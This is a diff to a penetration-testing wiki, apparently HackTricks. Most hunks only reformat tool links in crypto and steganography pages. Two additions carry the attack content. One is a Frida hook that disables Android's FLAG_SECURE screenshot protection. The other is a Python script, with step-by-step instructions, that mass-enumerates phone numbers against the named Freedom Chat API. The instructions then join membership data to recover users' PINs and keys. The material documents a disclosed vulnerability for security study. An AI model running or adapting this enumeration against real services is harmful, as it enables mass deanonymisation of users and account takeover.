"Super secure" MAGA-themed messaging app leaks everyone’s ph...

src/crypto/ctf-workflow/README.md

@@ -17,12 +17,12 @@ These are useful when the task is identification and layer peeling, or when you
 ### Hash lookups
 
 - Google the hash (surprisingly effective).
-- https://crackstation.net/
-- https://md5decrypt.net/
-- https://hashes.org/search.php
-- https://www.onlinehashcrack.com/
-- https://gpuhash.me/
-- http://hashtoolkit.com/reverse-hash
+- [https://crackstation.net/](https://crackstation.net/)
+- [https://md5decrypt.net/](https://md5decrypt.net/)
+- [https://hashes.org/search.php](https://hashes.org/search.php)
+- [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com/)
+- [https://gpuhash.me/](https://gpuhash.me/)
+- [http://hashtoolkit.com/reverse-hash](http://hashtoolkit.com/reverse-hash)
 
 ### Identification helpers
 
@@ -71,8 +71,8 @@ Common tells:
 
 ### Vigenère
 
-- https://www.dcode.fr/vigenere-cipher
-- https://www.guballa.de/vigenere-solver
+- [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher)
+- [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver)
 
 ### Bacon cipher
 
@@ -153,8 +153,8 @@ CTFs sometimes give `openssl enc` outputs (header often begins with `Salted__`).
 
 Bruteforce helpers:
 
-- https://github.com/glv2/bruteforce-salted-openssl
-- https://github.com/carlospolop/easy_BFopensslCTF
+- [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl)
+- [https://github.com/carlospolop/easy_BFopensslCTF](https://github.com/carlospolop/easy_BFopensslCTF)
 
 ### General toolset
 

src/crypto/symmetric/README.md

@@ -171,7 +171,7 @@ If you know any plaintext segment at position `i`, you can recover keystream byt
 
 Autosolvers:
 
-- https://wiremask.eu/tools/xor-cracker/
+- [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/)
 
 ### RC4
 

src/crypto/tls-and-certificates/README.md

@@ -45,6 +45,6 @@ openssl pkcs12 -in file.pfx -out out.pem
 
 ### CT logs
 
-- https://crt.sh/
+- [https://crt.sh/](https://crt.sh/)
 
 {{#include ../../banners/hacktricks-training.md}}

src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md

@@ -204,6 +204,64 @@ adb install-multiple split1.apk split2.apk ...
 ```
 - For distribution, you can merge splits into a single APK with APKEditor, then align/sign
 
+## Clearing FLAG_SECURE during dynamic analysis
+
+Apps that call `getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE)` prevent screenshots, remote displays and even Android's recent-task snapshots. When Freedom Chat enforced this flag the only way to document the leaks was to tamper with the window at runtime. A reliable pattern is:
+
+- Hook every `Window` overload that can re-apply the flag (`setFlags`, `addFlags`, `setAttributes`) and mask out bit `0x00002000` (`WindowManager.LayoutParams.FLAG_SECURE`).
+- After each activity resumes, schedule a UI-thread call to `clearFlags(FLAG_SECURE)` so Dialogs/Fragments created later inherit the unlocked state.
+- Apps built with React Native / Flutter often create nested windows; hook `android.app.Dialog`/`android.view.View` helpers or walk `getWindow().peekDecorView()` if you still see black frames.
+
+<details>
+<summary>Frida hook clearing Window.FLAG_SECURE</summary>
+
+```javascript
+Java.perform(function () {
+  var LayoutParams = Java.use("android.view.WindowManager$LayoutParams");
+  var FLAG_SECURE = LayoutParams.FLAG_SECURE.value;
+  var Window = Java.use("android.view.Window");
+  var Activity = Java.use("android.app.Activity");
+
+  function strip(value) {
+    var masked = value & (~FLAG_SECURE);
+    if (masked !== value) {
+      console.log("[-] Stripped FLAG_SECURE from 0x" + value.toString(16));
+    }
+    return masked;
+  }
+
+  Window.setFlags.overload('int', 'int').implementation = function (flags, mask) {
+    return this.setFlags.call(this, strip(flags), strip(mask));
+  };
+
+  Window.addFlags.implementation = function (flags) {
+    return this.addFlags.call(this, strip(flags));
+  };
+
+  Window.setAttributes.implementation = function (attrs) {
+    attrs.flags.value = strip(attrs.flags.value);
+    return this.setAttributes.call(this, attrs);
+  };
+
+  Activity.onResume.implementation = function () {
+    this.onResume();
+    var self = this;
+    Java.scheduleOnMainThread(function () {
+      try {
+        self.getWindow().clearFlags(FLAG_SECURE);
+        console.log("[+] Cleared FLAG_SECURE on " + self.getClass().getName());
+      } catch (err) {
+        console.log("[!] clearFlags failed: " + err);
+      }
+    });
+  };
+});
+```
+
+</details>
+
+Run the script with `frida -U -f <package> -l disable-flag-secure.js --no-pause`, interact with the UI, and screenshots/recordings will work again. Because everything happens on the UI thread there is no flicker, and you can still combine the hook with HTTP Toolkit/Burp to capture the traffic that revealed the `/channel` PIN leak.
+
 ## Tutorials
 
 ### [Tutorial 1](frida-tutorial-1.md)
@@ -395,5 +453,7 @@ Java.choose("com.example.a11x256.frida_test.my_activity", {
 - [Library injection for debuggable Android apps (blog)](https://koz.io/library-injection-for-debuggable-android-apps/)
 - [jdwp-lib-injector (original idea/tool)](https://github.com/ikoz/jdwp-lib-injector)
 - [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier)
+- ["Super secure" MAGA-themed messaging app leaks everyone’s phone number](https://ericdaigle.ca/posts/super-secure-maga-messaging-app-leaks-everyones-phone-number/)
+- [Android Frida Hooking: Disabling FLAG_SECURE](https://www.securify.nl/en/blog/android-frida-hooking-disabling-flagsecure/)
 
 {{#include ../../../banners/hacktricks-training.md}}

src/pentesting-web/web-vulnerabilities-methodology.md

@@ -141,6 +141,74 @@ These vulnerabilities might help to exploit other vulnerabilities.
 - [ ] [**Parameter Pollution**](parameter-pollution.md)
 - [ ] [**Unicode Normalization vulnerability**](unicode-injection/index.html)
 
+### Contact Discovery & Membership Enumeration APIs
+
+Messaging apps usually expose two dangerous classes of endpoints:
+
+- **Contact discovery** (`/user/numbers`, `/contacts/lookup`...) accepts an arbitrary array of identifiers and returns every entry that already has an account. When there is no rate limiting or payload cap the endpoint becomes an oracle that can enumerate an entire numbering plan.
+- **Membership or participants** endpoints (`/channel`, `/groups/<id>/members`) often return deeply nested `user` objects for each member. Developers frequently forget to strip secrets (PINs, recovery tokens, Seald keys, device fingerprints) because they assume only trusted clients will call them.
+
+A practical workflow (used against Freedom Chat) is:
+
+1. Generate the whole `{country code}{area code}{subscriber}` space but follow local numbering rules (NANP numbers may not start with 0/1 in the central office field).
+2. Send the numbers in huge tranches (40,000 per POST worked) together with a **control account** that is guaranteed to exist. When the JSON response contains more than one `uid`, you know another account matched that batch.
+3. Auto-refresh JWTs whenever the API returns `401`/`Unauthorized`, and log requests whose latency grows past a few seconds to detect soft throttling.
+4. Dump channel membership pages and join both datasets on `uid` to recover `phoneNumber → {uid, sealdKey, pin}` mappings for the whole user base.
+
+<details>
+<summary>Chunked contact-discovery enumeration with control account</summary>
+
+```python
+import itertools
+import requests
+import datetime
+
+digits = "0123456789"
+seven_digits = ["".join(d) for d in itertools.product(digits, repeat=7) if d[0] not in "01"]
+area_codes = ["201", "202", "203", "205", "206"]
+control = "+13322699625"
+
+
+def chunk(lst, size):
+    for i in range(0, len(lst), size):
+        yield lst[i:i + size]
+
+
+def spray_area(ac, access_token, refresh_token):
+    numbers = ["+1{}{}".format(ac, suffix) for suffix in seven_digits]
+    for slice in chunk(numbers, 40000):
+        slice.append(control)
+        payload = {"numbers": slice}
+        headers = {
+            "authorization": f"Bearer {access_token}",
+            "accept": "application/json, text/plain, */*",
+        }
+        resp = requests.post(
+            "https://eagle.freedomchat.com/user/numbers",
+            json=payload,
+            headers=headers,
+            timeout=10,
+        )
+        if resp.status_code == 401 or "Unauthorized" in resp.text:
+            tokens = requests.post(
+                "https://eagle.freedomchat.com/auth/refresh",
+                json={"refreshToken": refresh_token},
+                timeout=10,
+            ).json()
+            access_token, refresh_token = tokens["accessToken"], tokens["refreshToken"]
+            continue
+        hits = resp.json()
+        if len(hits) > 1:  # control uid plus newfound accounts
+            print(f"{ac}: {hits}")
+        if resp.elapsed > datetime.timedelta(seconds=3):
+            print(f"Slow response {resp.elapsed}")
+
+```
+
+</details>
+
+After enumerating `uid`s, enumerate `/channel?take=1000&skip=0` (or similar listing endpoints) and inspect `members[i].user`. Any field that allows account recovery (PINs, MFAs, `pinBackoffNb`, device keys) should be considered compromised if it lands in client responses. Joining both payloads deanonymises users, links them to political preferences, and bypasses “PIN-to-restore” flows because the PIN now travels with the phone number.
+
 ### **Web Servers & Middleware**
 
 Misconfigurations in the edge stack often unlock more impactful bugs in the application layer.
@@ -211,4 +279,8 @@ Modern applications extend into browsers, wallets, and automation pipelines—ke
 - [ ] [**wfuzz Web Fuzzing**](web-tool-wfuzz.md)
 
 
+## References
+
+- ["Super secure" MAGA-themed messaging app leaks everyone’s phone number](https://ericdaigle.ca/posts/super-secure-maga-messaging-app-leaks-everyones-phone-number/)
+
 {{#include ../banners/hacktricks-training.md}}

src/stego/audio/README.md

@@ -32,7 +32,7 @@ Spectrogram stego hides data by shaping energy over time/frequency so it becomes
 
 Primary tool for spectrogram inspection:
 
-- https://www.sonicvisualiser.org/
+- [https://www.sonicvisualiser.org/](https://www.sonicvisualiser.org/)
 
 ### Alternatives
 
@@ -71,7 +71,7 @@ python3 WavSteg.py -r -b 2 -s sound.wav -o out.bin
 
 ### DeepSound
 
-- http://jpinsoft.net/deepsound/download.aspx
+- [http://jpinsoft.net/deepsound/download.aspx](http://jpinsoft.net/deepsound/download.aspx)
 
 ## DTMF / dial tones
 
@@ -81,7 +81,7 @@ DTMF encodes characters as pairs of fixed frequencies (telephone keypad). If the
 
 Online decoders:
 
-- https://unframework.github.io/dtmf-detect/
-- http://dialabc.com/sound/detect/index.html
+- [https://unframework.github.io/dtmf-detect/](https://unframework.github.io/dtmf-detect/)
+- [http://dialabc.com/sound/detect/index.html](http://dialabc.com/sound/detect/index.html)
 
 {{#include ../../banners/hacktricks-training.md}}

src/stego/images/README.md

@@ -153,13 +153,13 @@ High-signal locations:
 
 If you are specifically facing steghide payloads in JPEGs, consider using `stegseek` (faster bruteforce than older scripts):
 
-- https://github.com/RickdeJager/stegseek
+- [https://github.com/RickdeJager/stegseek](https://github.com/RickdeJager/stegseek)
 
 ### Error Level Analysis
 
 ELA highlights different recompression artifacts; it can point you to regions that were edited, but it’s not a stego detector by itself:
 
-- https://29a.ch/sandbox/2012/imageerrorlevelanalysis/
+- [https://29a.ch/sandbox/2012/imageerrorlevelanalysis/](https://29a.ch/sandbox/2012/imageerrorlevelanalysis/)
 
 ## Animated images
 

src/stego/workflow/README.md

@@ -155,15 +155,15 @@ math.isqrt(2500)  # 50
 
 Binary-to-image helper:
 
-- https://www.dcode.fr/binary-image
+- [https://www.dcode.fr/binary-image](https://www.dcode.fr/binary-image)
 
 #### Braille
 
-- https://www.branah.com/braille-translator
+- [https://www.branah.com/braille-translator](https://www.branah.com/braille-translator)
 
 ## Reference lists
 
-- https://0xrick.github.io/lists/stego/
-- https://github.com/DominicBreuker/stego-toolkit
+- [https://0xrick.github.io/lists/stego/](https://0xrick.github.io/lists/stego/)
+- [https://github.com/DominicBreuker/stego-toolkit](https://github.com/DominicBreuker/stego-toolkit)
 
 {{#include ../../banners/hacktricks-training.md}}